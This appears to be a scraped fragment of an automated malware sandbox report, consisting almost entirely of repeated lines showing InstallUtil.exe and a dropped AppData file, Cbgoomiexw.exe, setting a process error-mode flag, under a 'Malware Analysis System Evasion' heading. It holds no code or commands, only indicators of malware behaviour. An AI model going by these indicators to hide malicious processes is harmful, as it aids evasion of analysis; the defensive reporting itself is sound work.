                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
